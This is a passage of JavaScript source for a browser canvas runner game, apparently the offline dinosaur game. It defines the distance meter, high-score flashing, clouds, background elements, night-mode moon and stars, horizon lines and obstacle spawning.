  this.maxScore = 0;
  this.highScore = '0';
  this.container = null;

  this.digits = [];
  this.achievement = false;
  this.defaultString = '';
  this.flashTimer = 0;
  this.flashIterations = 0;
  this.invertTrigger = false;
  this.flashingRafId = null;
  this.highScoreBounds = {};
  this.highScoreFlashing = false;

  this.config = DistanceMeter.config;
  this.maxScoreUnits = this.config.MAX_DISTANCE_UNITS;
  this.canvasWidth = canvasWidth;
  this.init(canvasWidth);
}


/**
 * @enum {number}
 */
DistanceMeter.dimensions = {
  WIDTH: 10,
  HEIGHT: 13,
  DEST_WIDTH: 11,
};


/**
 * Y positioning of the digits in the sprite sheet.
 * X position is always 0.
 * @type {Array<number>}
 */
DistanceMeter.yPos = [0, 13, 27, 40, 53, 67, 80, 93, 107, 120];


/**
 * Distance meter config.
 * @enum {number}
 */
DistanceMeter.config = {
  // Number of digits.
  MAX_DISTANCE_UNITS: 5,

  // Distance that causes achievement animation.
  ACHIEVEMENT_DISTANCE: 100,

  // Used for conversion from pixel distance to a scaled unit.
  COEFFICIENT: 0.025,

  // Flash duration in milliseconds.
  FLASH_DURATION: 1000 / 4,

  // Flash iterations for achievement animation.
  FLASH_ITERATIONS: 3,

  // Padding around the high score hit area.
  HIGH_SCORE_HIT_AREA_PADDING: 4,
};


DistanceMeter.prototype = {
  /**
   * Initialise the distance meter to '00000'.
   * @param {number} width Canvas width in px.
   */
  init(width) {
    let maxDistanceStr = '';

    this.calcXPos(width);
    this.maxScore = this.maxScoreUnits;
    for (let i = 0; i < this.maxScoreUnits; i++) {
      this.draw(i, 0);
      this.defaultString += '0';
      maxDistanceStr += '9';
    }

    this.maxScore = parseInt(maxDistanceStr, 10);
  },

  /**
   * Calculate the xPos in the canvas.
   * @param {number} canvasWidth
   */
  calcXPos(canvasWidth) {
    this.x = canvasWidth - (DistanceMeter.dimensions.DEST_WIDTH *
        (this.maxScoreUnits + 1));
  },

  /**
   * Draw a digit to canvas.
   * @param {number} digitPos Position of the digit.
   * @param {number} value Digit value 0-9.
   * @param {boolean=} opt_highScore Whether drawing the high score.
   */
  draw(digitPos, value, opt_highScore) {
    let sourceWidth = DistanceMeter.dimensions.WIDTH;
    let sourceHeight = DistanceMeter.dimensions.HEIGHT;
    let sourceX = DistanceMeter.dimensions.WIDTH * value;
    let sourceY = 0;

    const targetX = digitPos * DistanceMeter.dimensions.DEST_WIDTH;
    const targetY = this.y;
    const targetWidth = DistanceMeter.dimensions.WIDTH;
    const targetHeight = DistanceMeter.dimensions.HEIGHT;

    // For high DPI we 2x source values.
    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    this.canvasCtx.save();

    if (IS_RTL) {
      if (opt_highScore) {
        this.canvasCtx.translate(
            this.canvasWidth -
                (DistanceMeter.dimensions.WIDTH * (this.maxScoreUnits + 3)),
            this.y);
      } else {
        this.canvasCtx.translate(
            this.canvasWidth - DistanceMeter.dimensions.WIDTH, this.y);
      }
      this.canvasCtx.scale(-1, 1);
    } else {
      const highScoreX =
          this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH;
      if (opt_highScore) {
        this.canvasCtx.translate(highScoreX, this.y);
      } else {
        this.canvasCtx.translate(this.x, this.y);
      }
    }

    this.canvasCtx.drawImage(
        this.image,
        sourceX,
        sourceY,
        sourceWidth,
        sourceHeight,
        targetX,
        targetY,
        targetWidth,
        targetHeight,
    );

    this.canvasCtx.restore();
  },

  /**
   * Covert pixel distance to a 'real' distance.
   * @param {number} distance Pixel distance ran.
   * @return {number} The 'real' distance ran.
   */
  getActualDistance(distance) {
    return distance ? Math.round(distance * this.config.COEFFICIENT) : 0;
  },

  /**
   * Update the distance meter.
   * @param {number} distance
   * @param {number} deltaTime
   * @return {boolean} Whether the acheivement sound fx should be played.
   */
  update(deltaTime, distance) {
    let paint = true;
    let playSound = false;

    if (!this.achievement) {
      distance = this.getActualDistance(distance);
      // Score has gone beyond the initial digit count.
      if (distance > this.maxScore && this.maxScoreUnits ==
        this.config.MAX_DISTANCE_UNITS) {
        this.maxScoreUnits++;
        this.maxScore = parseInt(this.maxScore + '9', 10);
      } else {
        this.distance = 0;
      }

      if (distance > 0) {
        // Achievement unlocked.
        if (distance % this.config.ACHIEVEMENT_DISTANCE === 0) {
          // Flash score and play sound.
          this.achievement = true;
          this.flashTimer = 0;
          playSound = true;
        }

        // Create a string representation of the distance with leading 0.
        const distanceStr = (this.defaultString +
            distance).substr(-this.maxScoreUnits);
        this.digits = distanceStr.split('');
      } else {
        this.digits = this.defaultString.split('');
      }
    } else {
      // Control flashing of the score on reaching acheivement.
      if (this.flashIterations <= this.config.FLASH_ITERATIONS) {
        this.flashTimer += deltaTime;

        if (this.flashTimer < this.config.FLASH_DURATION) {
          paint = false;
        } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
          this.flashTimer = 0;
          this.flashIterations++;
        }
      } else {
        this.achievement = false;
        this.flashIterations = 0;
        this.flashTimer = 0;
      }
    }

    // Draw the digits if not flashing.
    if (paint) {
      for (let i = this.digits.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.digits[i], 10));
      }
    }

    this.drawHighScore();
    return playSound;
  },

  /**
   * Draw the high score.
   */
  drawHighScore() {
    if (parseInt(this.highScore, 10) > 0) {
      this.canvasCtx.save();
      this.canvasCtx.globalAlpha = .8;
      for (let i = this.highScore.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.highScore[i], 10), true);
      }
      this.canvasCtx.restore();
    }
  },

  /**
   * Set the highscore as a array string.
   * Position of char in the sprite: H - 10, I - 11.
   * @param {number} distance Distance ran in pixels.
   */
  setHighScore(distance) {
    distance = this.getActualDistance(distance);
    const highScoreStr = (this.defaultString +
        distance).substr(-this.maxScoreUnits);

    this.highScore = ['10', '11', ''].concat(highScoreStr.split(''));
  },


  /**
   * Whether a clicked is in the high score area.
   * @param {Event} e Event object.
   * @return {boolean} Whether the click was in the high score bounds.
   */
  hasClickedOnHighScore(e) {
    let x = 0;
    let y = 0;

    if (e.touches) {
      // Bounds for touch differ from pointer.
      const canvasBounds = this.canvas.getBoundingClientRect();
      x = e.touches[0].clientX - canvasBounds.left;
      y = e.touches[0].clientY - canvasBounds.top;
    } else {
      x = e.offsetX;
      y = e.offsetY;
    }

    this.highScoreBounds = this.getHighScoreBounds();
    return x >= this.highScoreBounds.x && x <=
        this.highScoreBounds.x + this.highScoreBounds.width &&
        y >= this.highScoreBounds.y && y <=
        this.highScoreBounds.y + this.highScoreBounds.height;
  },

  /**
   * Get the bounding box for the high score.
   * @return {Object} Object with x, y, width and height properties.
   */
  getHighScoreBounds() {
    return {
      x: (this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH) -
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      y: this.y,
      width: DistanceMeter.dimensions.WIDTH * (this.highScore.length + 1) +
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      height: DistanceMeter.dimensions.HEIGHT +
          (DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING * 2),
    };
  },

  /**
   * Animate flashing the high score to indicate ready for resetting.
   * The flashing stops following this.config.FLASH_ITERATIONS x 2 flashes.
   */
  flashHighScore() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);
    let paint = true;
    this.frameTimeStamp = now;

    // Reached the max number of flashes.
    if (this.flashIterations > this.config.FLASH_ITERATIONS * 2) {
      this.cancelHighScoreFlashing();
      return;
    }

    this.flashTimer += deltaTime;

    if (this.flashTimer < this.config.FLASH_DURATION) {
      paint = false;
    } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
      this.flashTimer = 0;
      this.flashIterations++;
    }

    if (paint) {
      this.drawHighScore();
    } else {
      this.clearHighScoreBounds();
    }
    // Frame update.
    this.flashingRafId =
        requestAnimationFrame(this.flashHighScore.bind(this));
  },

  /**
   * Draw empty rectangle over high score.
   */
  clearHighScoreBounds() {
    this.canvasCtx.save();
    this.canvasCtx.fillStyle = '#fff';
    this.canvasCtx.rect(this.highScoreBounds.x, this.highScoreBounds.y,
        this.highScoreBounds.width, this.highScoreBounds.height);
    this.canvasCtx.fill();
    this.canvasCtx.restore();
  },

  /**
   * Starts the flashing of the high score.
   */
  startHighScoreFlashing() {
    this.highScoreFlashing = true;
    this.flashHighScore();
  },

  /**
   * Whether high score is flashing.
   * @return {boolean}
   */
  isHighScoreFlashing() {
    return this.highScoreFlashing;
  },

  /**
   * Stop flashing the high score.
   */
  cancelHighScoreFlashing() {
    if (this.flashingRafId) {
      cancelAnimationFrame(this.flashingRafId);
    }
    this.flashIterations = 0;
    this.flashTimer = 0;
    this.highScoreFlashing = false;
    this.clearHighScoreBounds();
    this.drawHighScore();
  },

  /**
   * Clear the high score.
   */
  resetHighScore() {
    this.setHighScore(0);
    this.cancelHighScoreFlashing();
  },

  /**
   * Reset the distance meter back to '00000'.
   */
  reset() {
    this.update(0, 0);
    this.achievement = false;
  },
};


//******************************************************************************

/**
 * Cloud background item.
 * Similar to an obstacle object but without collision boxes.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @constructor
 */
function Cloud(canvas, spritePos, containerWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.gap =
      getRandomNum(Cloud.config.MIN_CLOUD_GAP, Cloud.config.MAX_CLOUD_GAP);

  this.init();
}


/**
 * Cloud object config.
 * @enum {number}
 */
Cloud.config = {
  HEIGHT: 14,
  MAX_CLOUD_GAP: 400,
  MAX_SKY_LEVEL: 30,
  MIN_CLOUD_GAP: 100,
  MIN_SKY_LEVEL: 71,
  WIDTH: 46,
};


Cloud.prototype = {
  /**
   * Initialise the cloud. Sets the Cloud height.
   */
  init() {
    this.yPos = getRandomNum(Cloud.config.MAX_SKY_LEVEL,
        Cloud.config.MIN_SKY_LEVEL);
    this.draw();
  },

  /**
   * Draw the cloud.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = Cloud.config.WIDTH;
    let sourceHeight = Cloud.config.HEIGHT;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;
    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    this.canvasCtx.drawImage(Runner.imageSprite, this.spritePos.x,
        this.spritePos.y,
        sourceWidth, sourceHeight,
        this.xPos, this.yPos,
        outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the cloud position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      this.xPos -= Math.ceil(speed);
      this.draw();

      // Mark as removeable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the cloud is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + Cloud.config.WIDTH > 0;
  },
};


/**
 * Background item.
 * Similar to cloud, without random y position.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @param {string} type Element type.
 * @constructor
 */
function BackgroundEl(canvas, spritePos, containerWidth, type) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.type = type;
  this.gap =
      getRandomNum(BackgroundEl.config.MIN_GAP, BackgroundEl.config.MAX_GAP);
  this.animTimer = 0;
  this.switchFrames = false;

  this.spriteConfig = {};
  this.init();
}

/**
 * Background element object config.
 * Real values assigned when game type changes.
 * @enum {number}
 */
BackgroundEl.config = {
  MAX_BG_ELS: 0,
  MAX_GAP: 0,
  MIN_GAP: 0,
  POS: 0,
  SPEED: 0,
  Y_POS: 0,
  MS_PER_FRAME: 0,  // only needed when BACKGROUND_EL.FIXED is true
};


BackgroundEl.prototype = {
  /**
   * Initialise the element setting the y position.
   */
  init() {
    this.spriteConfig = Runner.spriteDefinition.BACKGROUND_EL[this.type];
    if (this.spriteConfig.FIXED) {
      this.xPos = this.spriteConfig.FIXED_X_POS;
    }
    this.yPos = BackgroundEl.config.Y_POS - this.spriteConfig.HEIGHT +
        this.spriteConfig.OFFSET;
    this.draw();
  },

  /**
   * Draw the element.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = this.spriteConfig.WIDTH;
    let sourceHeight = this.spriteConfig.HEIGHT;
    let sourceX = this.spriteConfig.X_POS;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;

    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    this.canvasCtx.drawImage(
        Runner.imageSprite, sourceX, this.spritePos.y, sourceWidth,
        sourceHeight, this.xPos, this.yPos, outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the background element position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      if (this.spriteConfig.FIXED) {
        this.animTimer += speed;
        if (this.animTimer > BackgroundEl.config.MS_PER_FRAME) {
          this.animTimer = 0;
          this.switchFrames = !this.switchFrames;
        }

        if (this.spriteConfig.FIXED_Y_POS_1 &&
            this.spriteConfig.FIXED_Y_POS_2) {
          this.yPos = this.switchFrames ? this.spriteConfig.FIXED_Y_POS_1 :
                                          this.spriteConfig.FIXED_Y_POS_2;
        }
      } else {
        // Fixed speed, regardless of actual game speed.
        this.xPos -= BackgroundEl.config.SPEED;
      }
      this.draw();

      // Mark as removable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the element is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + this.spriteConfig.WIDTH > 0;
  },
};



//******************************************************************************

/**
 * Nightmode shows a moon and stars on the horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {number} spritePos
 * @param {number} containerWidth
 * @constructor
 */
function NightMode(canvas, spritePos, containerWidth) {
  this.spritePos = spritePos;
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.xPos = containerWidth - 50;
  this.yPos = 30;
  this.currentPhase = 0;
  this.opacity = 0;
  this.containerWidth = containerWidth;
  this.stars = [];
  this.drawStars = false;
  this.placeStars();
}

/**
 * @enum {number}
 */
NightMode.config = {
  FADE_SPEED: 0.035,
  HEIGHT: 40,
  MOON_SPEED: 0.25,
  NUM_STARS: 2,
  STAR_SIZE: 9,
  STAR_SPEED: 0.3,
  STAR_MAX_Y: 70,
  WIDTH: 20,
};

NightMode.phases = [140, 120, 100, 60, 40, 20, 0];

NightMode.prototype = {
  /**
   * Update moving moon, changing phases.
   * @param {boolean} activated Whether night mode is activated.
   */
  update(activated) {
    // Moon phase.
    if (activated && this.opacity === 0) {
      this.currentPhase++;

      if (this.currentPhase >= NightMode.phases.length) {
        this.currentPhase = 0;
      }
    }

    // Fade in / out.
    if (activated && (this.opacity < 1 || this.opacity === 0)) {
      this.opacity += NightMode.config.FADE_SPEED;
    } else if (this.opacity > 0) {
      this.opacity -= NightMode.config.FADE_SPEED;
    }

    // Set moon positioning.
    if (this.opacity > 0) {
      this.xPos = this.updateXPos(this.xPos, NightMode.config.MOON_SPEED);

      // Update stars.
      if (this.drawStars) {
        for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
          this.stars[i].x =
              this.updateXPos(this.stars[i].x, NightMode.config.STAR_SPEED);
        }
      }
      this.draw();
    } else {
      this.opacity = 0;
      this.placeStars();
    }
    this.drawStars = true;
  },

  updateXPos(currentPos, speed) {
    if (currentPos < -NightMode.config.WIDTH) {
      currentPos = this.containerWidth;
    } else {
      currentPos -= speed;
    }
    return currentPos;
  },

  draw() {
    let moonSourceWidth = this.currentPhase === 3 ? NightMode.config.WIDTH * 2 :
                                                    NightMode.config.WIDTH;
    let moonSourceHeight = NightMode.config.HEIGHT;
    let moonSourceX = this.spritePos.x + NightMode.phases[this.currentPhase];
    const moonOutputWidth = moonSourceWidth;
    let starSize = NightMode.config.STAR_SIZE;
    let starSourceX = Runner.spriteDefinitionByType.original.LDPI.STAR.x;

    if (IS_HIDPI) {
      moonSourceWidth *= 2;
      moonSourceHeight *= 2;
      moonSourceX = this.spritePos.x +
          (NightMode.phases[this.currentPhase] * 2);
      starSize *= 2;
      starSourceX = Runner.spriteDefinitionByType.original.HDPI.STAR.x;
    }

    this.canvasCtx.save();
    this.canvasCtx.globalAlpha = this.opacity;

    // Stars.
    if (this.drawStars) {
      for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
        this.canvasCtx.drawImage(
            Runner.origImageSprite, starSourceX, this.stars[i].sourceY,
            starSize, starSize, Math.round(this.stars[i].x), this.stars[i].y,
            NightMode.config.STAR_SIZE, NightMode.config.STAR_SIZE);
      }
    }

    // Moon.
    this.canvasCtx.drawImage(
        Runner.origImageSprite, moonSourceX, this.spritePos.y, moonSourceWidth,
        moonSourceHeight, Math.round(this.xPos), this.yPos, moonOutputWidth,
        NightMode.config.HEIGHT);

    this.canvasCtx.globalAlpha = 1;
    this.canvasCtx.restore();
  },

  // Do star placement.
  placeStars() {
    const segmentSize = Math.round(this.containerWidth /
        NightMode.config.NUM_STARS);

    for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
      this.stars[i] = {};
      this.stars[i].x = getRandomNum(segmentSize * i, segmentSize * (i + 1));
      this.stars[i].y = getRandomNum(0, NightMode.config.STAR_MAX_Y);

      if (IS_HIDPI) {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.HDPI.STAR.y +
            NightMode.config.STAR_SIZE * 2 * i;
      } else {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.LDPI.STAR.y +
            NightMode.config.STAR_SIZE * i;
      }
    }
  },

  reset() {
    this.currentPhase = 0;
    this.opacity = 0;
    this.update(false);
  },

};


//******************************************************************************

/**
 * Horizon Line.
 * Consists of two connecting lines. Randomly assigns a flat / bumpy horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} lineConfig Configuration object.
 * @constructor
 */
function HorizonLine(canvas, lineConfig) {
  let sourceX = lineConfig.SOURCE_X;
  let sourceY = lineConfig.SOURCE_Y;

  if (IS_HIDPI) {
    sourceX *= 2;
    sourceY *= 2;
  }

  this.spritePos = {x: sourceX, y: sourceY};
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.sourceDimensions = {};
  this.dimensions = lineConfig;

  this.sourceXPos = [this.spritePos.x, this.spritePos.x +
      this.dimensions.WIDTH];
  this.xPos = [];
  this.yPos = 0;
  this.bumpThreshold = 0.5;

  this.setSourceDimensions(lineConfig);
  this.draw();
}


/**
 * Horizon line dimensions.
 * @enum {number}
 */
HorizonLine.dimensions = {
  WIDTH: 600,
  HEIGHT: 12,
  YPOS: 127,
};


HorizonLine.prototype = {
  /**
   * Set the source dimensions of the horizon line.
   */
  setSourceDimensions(newDimensions) {
    for (const dimension in newDimensions) {
      if (dimension !== 'SOURCE_X' && dimension !== 'SOURCE_Y') {
        if (IS_HIDPI) {
          if (dimension !== 'YPOS') {
            this.sourceDimensions[dimension] = newDimensions[dimension] * 2;
          }
        } else {
          this.sourceDimensions[dimension] = newDimensions[dimension];
        }
        this.dimensions[dimension] = newDimensions[dimension];
      }
    }

    this.xPos = [0, newDimensions.WIDTH];
    this.yPos = newDimensions.YPOS;
  },

  /**
   * Return the crop x position of a type.
   */
  getRandomType() {
    return Math.random() > this.bumpThreshold ? this.dimensions.WIDTH : 0;
  },

  /**
   * Draw the horizon line.
   */
  draw() {
    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[0],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[0], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);

    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[1],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[1], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);
  },

  /**
   * Update the x position of an indivdual piece of the line.
   * @param {number} pos Line position.
   * @param {number} increment
   */
  updateXPos(pos, increment) {
    const line1 = pos;
    const line2 = pos === 0 ? 1 : 0;

    this.xPos[line1] -= increment;
    this.xPos[line2] = this.xPos[line1] + this.dimensions.WIDTH;

    if (this.xPos[line1] <= -this.dimensions.WIDTH) {
      this.xPos[line1] += this.dimensions.WIDTH * 2;
      this.xPos[line2] = this.xPos[line1] - this.dimensions.WIDTH;
      this.sourceXPos[line1] = this.getRandomType() + this.spritePos.x;
    }
  },

  /**
   * Update the horizon line.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    const increment = Math.floor(speed * (FPS / 1000) * deltaTime);

    if (this.xPos[0] <= 0) {
      this.updateXPos(0, increment);
    } else {
      this.updateXPos(1, increment);
    }
    this.draw();
  },

  /**
   * Reset horizon to the starting position.
   */
  reset() {
    this.xPos[0] = 0;
    this.xPos[1] = this.dimensions.WIDTH;
  },
};


//******************************************************************************

/**
 * Horizon background class.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Sprite positioning.
 * @param {Object} dimensions Canvas dimensions.
 * @param {number} gapCoefficient
 * @constructor
 */
function Horizon(canvas, spritePos, dimensions, gapCoefficient) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.config = Horizon.config;
  this.dimensions = dimensions;
  this.gapCoefficient = gapCoefficient;
  this.obstacles = [];
  this.obstacleHistory = [];
  this.horizonOffsets = [0, 0];
  this.cloudFrequency = this.config.CLOUD_FREQUENCY;
  this.spritePos = spritePos;
  this.nightMode = null;
  this.altGameModeActive = false;

  // Cloud
  this.clouds = [];
  this.cloudSpeed = this.config.BG_CLOUD_SPEED;

  // Background elements
  this.backgroundEls = [];
  this.lastEl = null;
  this.backgroundSpeed = this.config.BG_CLOUD_SPEED;

  // Horizon
  this.horizonLine = null;
  this.horizonLines = [];
  this.init();
}


/**
 * Horizon config.
 * @enum {number}
 */
Horizon.config = {
  BG_CLOUD_SPEED: 0.2,
  BUMPY_THRESHOLD: .3,
  CLOUD_FREQUENCY: .5,
  HORIZON_HEIGHT: 16,
  MAX_CLOUDS: 6,
};


Horizon.prototype = {
  /**
   * Initialise the horizon. Just add the line and a cloud. No obstacles.
   */
  init() {
    Obstacle.types = Runner.spriteDefinitionByType.original.OBSTACLES;
    this.addCloud();
    // Multiple Horizon lines
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }

    this.nightMode = new NightMode(this.canvas, this.spritePos.MOON,
        this.dimensions.WIDTH);
  },

  /**
   * Update obstacle definitions based on the speed of the game.
   */
  adjustObstacleSpeed: function() {
    for (let i = 0; i < Obstacle.types.length; i++) {
      if (Runner.slowDown) {
        Obstacle.types[i].multipleSpeed = Obstacle.types[i].multipleSpeed / 2;
        Obstacle.types[i].minGap *= 1.5;
        Obstacle.types[i].minSpeed = Obstacle.types[i].minSpeed / 2;

        // Convert variable y position obstacles to fixed.
        if (typeof (Obstacle.types[i].yPos) == 'object') {
          Obstacle.types[i].yPos = Obstacle.types[i].yPos[0];
          Obstacle.types[i].yPosMobile = Obstacle.types[i].yPos[0];
        }
      }
    }
  },

  /**
   * Update sprites to correspond to change in sprite sheet.
   * @param {number} spritePos
   */
  enableAltGameMode: function(spritePos) {
    // Clear existing horizon objects.
    this.clouds = [];
    this.backgroundEls = [];

    this.altGameModeActive = true;
    this.spritePos = spritePos;

    Obstacle.types = Runner.spriteDefinition.OBSTACLES;
    this.adjustObstacleSpeed();

    Obstacle.MAX_GAP_COEFFICIENT = Runner.spriteDefinition.MAX_GAP_COEFFICIENT;
    Obstacle.MAX_OBSTACLE_LENGTH = Runner.spriteDefinition.MAX_OBSTACLE_LENGTH;

    BackgroundEl.config = Runner.spriteDefinition.BACKGROUND_EL_CONFIG;

    this.horizonLines = [];
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }
    this.reset();
  },

  /**
   * @param {number} deltaTime
   * @param {number} currentSpeed
   * @param {boolean} updateObstacles Used as an override to prevent
   *     the obstacles from being updated / added. This happens in the
   *     ease in section.
   * @param {boolean} showNightMode Night mode activated.
   */
  update(deltaTime, currentSpeed, updateObstacles, showNightMode) {
    this.runningTime += deltaTime;

    if (this.altGameModeActive) {
      this.updateBackgroundEls(deltaTime, currentSpeed);
    }

    for (let i = 0; i < this.horizonLines.length; i++) {
      this.horizonLines[i].update(deltaTime, currentSpeed);
    }

    if (!this.altGameModeActive || Runner.spriteDefinition.HAS_CLOUDS) {
      this.nightMode.update(showNightMode);
      this.updateClouds(deltaTime, currentSpeed);
    }

    if (updateObstacles) {
      this.updateObstacles(deltaTime, currentSpeed);
    }
  },

  /**
   * Update background element positions. Also handles creating new elements.
   * @param {number} elSpeed
   * @param {Array<Object>} bgElArray
   * @param {number} maxBgEl
   * @param {Function} bgElAddFunction
   * @param {number} frequency
   */
  updateBackgroundEl(elSpeed, bgElArray, maxBgEl, bgElAddFunction, frequency) {
    const numElements = bgElArray.length;

    if (numElements) {
      for (let i = numElements - 1; i >= 0; i--) {
        bgElArray[i].update(elSpeed);
      }

      const lastEl = bgElArray[numElements - 1];

      // Check for adding a new element.
      if (numElements < maxBgEl &&
          (this.dimensions.WIDTH - lastEl.xPos) > lastEl.gap &&
          frequency > Math.random()) {
        bgElAddFunction();
      }
    } else {
      bgElAddFunction();
    }
  },

  /**
   * Update the cloud positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateClouds(deltaTime, speed) {
    const elSpeed = this.cloudSpeed / 1000 * deltaTime * speed;
    this.updateBackgroundEl(
        elSpeed, this.clouds, this.config.MAX_CLOUDS, this.addCloud.bind(this),
        this.cloudFrequency);

    // Remove expired elements.
    this.clouds = this.clouds.filter((obj) => !obj.remove);
  },

  /**
   * Update the background element positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateBackgroundEls(deltaTime, speed) {
    this.updateBackgroundEl(
        deltaTime, this.backgroundEls, BackgroundEl.config.MAX_BG_ELS,
        this.addBackgroundEl.bind(this), this.cloudFrequency);

    // Remove expired elements.
    this.backgroundEls = this.backgroundEls.filter((obj) => !obj.remove);
  },

  /**
   * Update the obstacle positions.
   * @param {number} deltaTime
   * @param {number} currentSpeed
   */
  updateObstacles(deltaTime, currentSpeed) {
    const updatedObstacles = this.obstacles.slice(0);

    for (let i = 0; i < this.obstacles.length; i++) {
      const obstacle = this.obstacles[i];
      obstacle.update(deltaTime, currentSpeed);

      // Clean up existing obstacles.
      if (obstacle.remove) {
        updatedObstacles.shift();
      }
    }
    this.obstacles = updatedObstacles;

    if (this.obstacles.length > 0) {
      const lastObstacle = this.obstacles[this.obstacles.length - 1];

      if (lastObstacle && !lastObstacle.followingObstacleCreated &&
          lastObstacle.isVisible() &&
          (lastObstacle.xPos + lastObstacle.width + lastObstacle.gap) <
          this.dimensions.WIDTH) {
        this.addNewObstacle(currentSpeed);
        lastObstacle.followingObstacleCreated = true;
      }
    } else {
      // Create new obstacles.
      this.addNewObstacle(currentSpeed);
    }
  },

  removeFirstObstacle() {
    this.obstacles.shift();
  },

  /**
   * Add a new obstacle.
   * @param {number} currentSpeed
   */
  addNewObstacle(currentSpeed) {
    const obstacleCount =
        Obstacle.types[Obstacle.types.length - 1].type != 'COLLECTABLE' ||
            (Runner.isAltGameModeEnabled() && !this.altGameModeActive ||
             this.altGameModeActive) ?
        Obstacle.types.length - 1 :
        Obstacle.types.length - 2;
    const obstacleTypeIndex =
        obstacleCount > 0 ? getRandomNum(0, obstacleCount) : 0;
    const obstacleType = Obstacle.types[obstacleTypeIndex];

    // Check for multiples of the same type of obstacle.
    // Also check obstacle is available at current speed.
    if ((obstacleCount > 0 && this.duplicateObstacleCheck(obstacleType.type)) ||
        currentSpeed < obstacleType.minSpeed) {
      this.addNewObstacle(currentSpeed);
    } else {
      const obstacleSpritePos = this.spritePos[obstacleType.type];

      this.obstacles.push(new Obstacle(
          this.canvasCtx, obstacleType, obstacleSpritePos, this.dimensions,
          this.gapCoefficient, currentSpeed, obstacleType.width,
          this.altGameModeActive));

      this.obstacleHistory.unshift(obstacleType.type);

      if (this.obstacleHistory.length > 1) {
        this.obstacleHistory.splice(Runner.config.MAX_OBSTACLE_DUPLICATION);
      }
    }
  },

  /**
   * Returns whether the previous two obstacles are the same as the next one.
   * Maximum duplication is set in config value MAX_OBSTACLE_DUPLICATION.
   * @return {boolean}
   */
  duplicateObstacleCheck(nextObstacleType) {
    let duplicateCount = 0;

    for (let i = 0; i < this.obstacleHistory.length; i++) {
      duplicateCount =
          this.obstacleHistory[i] === nextObstacleType ? duplicateCount + 1 : 0;
    }
    return duplicateCount >= Runner.config.MAX_OBSTACLE_DUPLICATION;
  },

  /**
   * Reset the horizon layer.
   * Remove existing obstacles and reposition the horizon line.
   */
  reset() {
    this.obstacles = [];
    for (let l = 0; l < this.horizonLines.length; l++) {
      this.horizonLines[l].reset();
    }

    this.nightMode.reset();
  },

  /**
   * Update the canvas width and scaling.
